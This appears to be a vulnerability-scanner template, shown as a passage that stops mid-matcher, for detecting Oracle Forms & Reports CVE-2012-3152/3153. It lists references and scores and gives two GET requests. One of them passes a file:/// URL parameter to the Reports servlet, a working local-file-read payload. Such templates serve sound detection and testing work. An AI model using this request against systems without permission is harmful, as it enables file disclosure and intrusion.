id: CVE-2012-3153 info: name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security severity: medium description: | An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. remediation: | Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 - https://www.oracle.com/security-alerts/cpuoct2012.html - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.96555 epss-percentile: 0.99502 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle product: fusion_middleware tags: cve,cve2012,oracle,rce,edb http: - method: GET path: - "{{BaseURL}}/reports/rwservlet/showenv" - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_1, "Reports Servlet")' - type: dsl dsl: - '!contains(body_2, "